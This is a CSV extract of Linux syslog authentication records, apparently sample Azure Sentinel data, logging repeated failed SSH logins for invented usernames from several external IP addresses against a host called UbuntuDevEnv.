+19125,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:57:49,UbuntuDevEnv,2019-06-26 12:57:49,auth,UbuntuDevEnv,info,Failed password for invalid user nagios from 194.228.3.191 port 52722 ssh2,118565,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,194.228.3.1,52722,,
+19126,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:57:49,UbuntuDevEnv,2019-06-26 12:57:49,auth,UbuntuDevEnv,info,Disconnected from invalid user nagios 194.228.3.191 port 52722 [preauth],118565,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,194.228.3.1,52722,,
+19127,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:57:49,UbuntuDevEnv,2019-06-26 12:57:49,auth,UbuntuDevEnv,info,Received disconnect from 194.228.3.191 port 52722:11: Bye Bye [preauth],118565,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,52722,,
+19128,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:59:24,UbuntuDevEnv,2019-06-26 12:59:23,auth,UbuntuDevEnv,info,Invalid user tatiana from 194.228.3.191 port 33006,118902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tatiana,194.228.3.1,33006,,
+19129,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:59:24,UbuntuDevEnv,2019-06-26 12:59:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=194.228.3.191,118902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,194.228.3.1,,0,
+19130,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:59:24,UbuntuDevEnv,2019-06-26 12:59:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,118902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19131,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:59:26,UbuntuDevEnv,2019-06-26 12:59:25,auth,UbuntuDevEnv,info,Failed password for invalid user tatiana from 194.228.3.191 port 33006 ssh2,118902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tatiana,194.228.3.1,33006,,
+19132,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:59:26,UbuntuDevEnv,2019-06-26 12:59:25,auth,UbuntuDevEnv,info,Received disconnect from 194.228.3.191 port 33006:11: Bye Bye [preauth],118902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,33006,,
+19133,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:59:26,UbuntuDevEnv,2019-06-26 12:59:25,auth,UbuntuDevEnv,info,Disconnected from invalid user tatiana 194.228.3.191 port 33006 [preauth],118902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tatiana,194.228.3.1,33006,,
+19134,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:59:32,UbuntuDevEnv,2019-06-26 12:59:32,auth,UbuntuDevEnv,info,Invalid user jsimon from 201.48.54.81 port 57170,118937,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jsimon,201.48.54.8,57170,,
+19135,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:59:32,UbuntuDevEnv,2019-06-26 12:59:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=201.48.54.81,118937,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,201.48.54.8,,0,
+19136,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:59:32,UbuntuDevEnv,2019-06-26 12:59:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,118937,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19137,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:59:34,UbuntuDevEnv,2019-06-26 12:59:33,auth,UbuntuDevEnv,info,Failed password for invalid user jsimon from 201.48.54.81 port 57170 ssh2,118937,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jsimon,201.48.54.8,57170,,
+19138,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:59:34,UbuntuDevEnv,2019-06-26 12:59:34,auth,UbuntuDevEnv,info,Received disconnect from 201.48.54.81 port 57170:11: Bye Bye [preauth],118937,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,201.48.54.8,57170,,
+19139,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:59:34,UbuntuDevEnv,2019-06-26 12:59:34,auth,UbuntuDevEnv,info,Disconnected from invalid user jsimon 201.48.54.81 port 57170 [preauth],118937,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jsimon,201.48.54.8,57170,,
+19140,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:08:33,UbuntuDevEnv,2019-06-26 13:08:33,auth,UbuntuDevEnv,info,Invalid user admin from 194.228.3.191 port 55893,120951,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,194.228.3.1,55893,,
+19141,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:08:33,UbuntuDevEnv,2019-06-26 13:08:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,120951,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19142,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:08:33,UbuntuDevEnv,2019-06-26 13:08:33,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=194.228.3.191,120951,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,194.228.3.1,,0,
+19143,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:08:35,UbuntuDevEnv,2019-06-26 13:08:34,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 194.228.3.191 port 55893 ssh2,120951,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,194.228.3.1,55893,,
+19144,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:08:35,UbuntuDevEnv,2019-06-26 13:08:34,auth,UbuntuDevEnv,info,Received disconnect from 194.228.3.191 port 55893:11: Bye Bye [preauth],120951,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,55893,,
+19145,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:08:35,UbuntuDevEnv,2019-06-26 13:08:34,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 194.228.3.191 port 55893 [preauth],120951,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,194.228.3.1,55893,,
+19146,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:08:35,UbuntuDevEnv,2019-06-26 13:08:35,auth,UbuntuDevEnv,info,Invalid user wp from 201.48.54.81 port 42698,120955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wp,201.48.54.8,42698,,
+19147,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:08:35,UbuntuDevEnv,2019-06-26 13:08:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=201.48.54.81,120955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,201.48.54.8,,0,
+19148,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:08:35,UbuntuDevEnv,2019-06-26 13:08:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,120955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19149,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:08:37,UbuntuDevEnv,2019-06-26 13:08:37,auth,UbuntuDevEnv,info,Failed password for invalid user wp from 201.48.54.81 port 42698 ssh2,120955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wp,201.48.54.8,42698,,
+19150,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:08:38,UbuntuDevEnv,2019-06-26 13:08:37,auth,UbuntuDevEnv,info,Received disconnect from 201.48.54.81 port 42698:11: Bye Bye [preauth],120955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,201.48.54.8,42698,,
+19151,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:08:38,UbuntuDevEnv,2019-06-26 13:08:37,auth,UbuntuDevEnv,info,Disconnected from invalid user wp 201.48.54.81 port 42698 [preauth],120955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wp,201.48.54.8,42698,,
+19152,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:09:09,UbuntuDevEnv,2019-06-26 13:09:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.115.27  user=test,121077,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,157.230.115.2,,0,
+19153,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:09:11,UbuntuDevEnv,2019-06-26 13:09:11,auth,UbuntuDevEnv,info,Failed password for test from 157.230.115.27 port 40872 ssh2,121077,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.115.2,40872,,
+19154,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:09:11,UbuntuDevEnv,2019-06-26 13:09:11,auth,UbuntuDevEnv,info,Received disconnect from 157.230.115.27 port 40872:11: Bye Bye [preauth],121077,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.115.2,40872,,
+19155,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:09:11,UbuntuDevEnv,2019-06-26 13:09:11,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 157.230.115.27 port 40872 [preauth],121077,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,157.230.115.2,40872,,
+19156,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:09:48,UbuntuDevEnv,2019-06-26 13:09:47,auth,UbuntuDevEnv,info,Invalid user weblogic from 139.199.34.112 port 53550,121207,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,weblogic,139.199.34.1,53550,,
+19157,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:09:48,UbuntuDevEnv,2019-06-26 13:09:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,121207,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19158,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:09:48,UbuntuDevEnv,2019-06-26 13:09:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.34.112,121207,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.34.1,,0,
+19159,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:09:50,UbuntuDevEnv,2019-06-26 13:09:49,auth,UbuntuDevEnv,info,Failed password for invalid user weblogic from 139.199.34.112 port 53550 ssh2,121207,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,weblogic,139.199.34.1,53550,,
+19160,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:09:50,UbuntuDevEnv,2019-06-26 13:09:50,auth,UbuntuDevEnv,info,Received disconnect from 139.199.34.112 port 53550:11: Bye Bye [preauth],121207,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.34.1,53550,,
+19161,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:09:50,UbuntuDevEnv,2019-06-26 13:09:50,auth,UbuntuDevEnv,info,Disconnected from invalid user weblogic 139.199.34.112 port 53550 [preauth],121207,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,weblogic,139.199.34.1,53550,,
+19162,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:19:19,UbuntuDevEnv,2019-06-26 13:19:19,auth,UbuntuDevEnv,info,Invalid user ruan from 194.228.3.191 port 59062,123350,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ruan,194.228.3.1,59062,,
+19163,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:19:20,UbuntuDevEnv,2019-06-26 13:19:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,123350,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19164,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:19:20,UbuntuDevEnv,2019-06-26 13:19:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=194.228.3.191,123350,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,194.228.3.1,,0,
+19165,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:19:22,UbuntuDevEnv,2019-06-26 13:19:21,auth,UbuntuDevEnv,info,Failed password for invalid user ruan from 194.228.3.191 port 59062 ssh2,123350,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ruan,194.228.3.1,59062,,
+19166,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:19:22,UbuntuDevEnv,2019-06-26 13:19:21,auth,UbuntuDevEnv,info,Disconnected from invalid user ruan 194.228.3.191 port 59062 [preauth],123350,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ruan,194.228.3.1,59062,,
+19167,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:19:22,UbuntuDevEnv,2019-06-26 13:19:21,auth,UbuntuDevEnv,info,Received disconnect from 194.228.3.191 port 59062:11: Bye Bye [preauth],123350,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,59062,,
+19168,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:20:35,UbuntuDevEnv,2019-06-26 13:20:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,123622,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19169,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:20:35,UbuntuDevEnv,2019-06-26 13:20:35,auth,UbuntuDevEnv,info,Invalid user liao from 139.199.34.112 port 47820,123622,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,liao,139.199.34.1,47820,,
+19170,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:20:35,UbuntuDevEnv,2019-06-26 13:20:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.34.112,123622,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.34.1,,0,
+19171,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:20:37,UbuntuDevEnv,2019-06-26 13:20:37,auth,UbuntuDevEnv,info,Failed password for invalid user liao from 139.199.34.112 port 47820 ssh2,123622,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,liao,139.199.34.1,47820,,
+19172,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:20:37,UbuntuDevEnv,2019-06-26 13:20:37,auth,UbuntuDevEnv,info,Disconnected from invalid user liao 139.199.34.112 port 47820 [preauth],123622,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,liao,139.199.34.1,47820,,
+19173,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:20:37,UbuntuDevEnv,2019-06-26 13:20:37,auth,UbuntuDevEnv,info,Received disconnect from 139.199.34.112 port 47820:11: Bye Bye [preauth],123622,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.34.1,47820,,
+19174,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:21:49,UbuntuDevEnv,2019-06-26 13:21:48,auth,UbuntuDevEnv,info,Invalid user daniel from 157.230.115.27 port 52068,124269,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,daniel,157.230.115.2,52068,,
+19175,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:21:49,UbuntuDevEnv,2019-06-26 13:21:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.115.27,124269,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.115.2,,0,
+19176,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:21:49,UbuntuDevEnv,2019-06-26 13:21:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,124269,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19177,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:21:51,UbuntuDevEnv,2019-06-26 13:21:50,auth,UbuntuDevEnv,info,Failed password for invalid user daniel from 157.230.115.27 port 52068 ssh2,124269,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,daniel,157.230.115.2,52068,,
+19178,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:21:51,UbuntuDevEnv,2019-06-26 13:21:50,auth,UbuntuDevEnv,info,Received disconnect from 157.230.115.27 port 52068:11: Bye Bye [preauth],124269,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.115.2,52068,,
+19179,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:21:51,UbuntuDevEnv,2019-06-26 13:21:50,auth,UbuntuDevEnv,info,Disconnected from invalid user daniel 157.230.115.27 port 52068 [preauth],124269,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,daniel,157.230.115.2,52068,,
+19180,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:21:55,UbuntuDevEnv,2019-06-26 13:21:54,auth,UbuntuDevEnv,info,Invalid user hua from 196.46.36.144 port 55906,124285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hua,196.46.36.1,55906,,
+19181,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:21:55,UbuntuDevEnv,2019-06-26 13:21:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.46.36.144,124285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.46.36.1,,0,
+19182,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:21:55,UbuntuDevEnv,2019-06-26 13:21:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,124285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19183,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:21:57,UbuntuDevEnv,2019-06-26 13:21:56,auth,UbuntuDevEnv,info,Failed password for invalid user hua from 196.46.36.144 port 55906 ssh2,124285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hua,196.46.36.1,55906,,
+19184,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:21:57,UbuntuDevEnv,2019-06-26 13:21:56,auth,UbuntuDevEnv,info,Disconnected from invalid user hua 196.46.36.144 port 55906 [preauth],124285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hua,196.46.36.1,55906,,
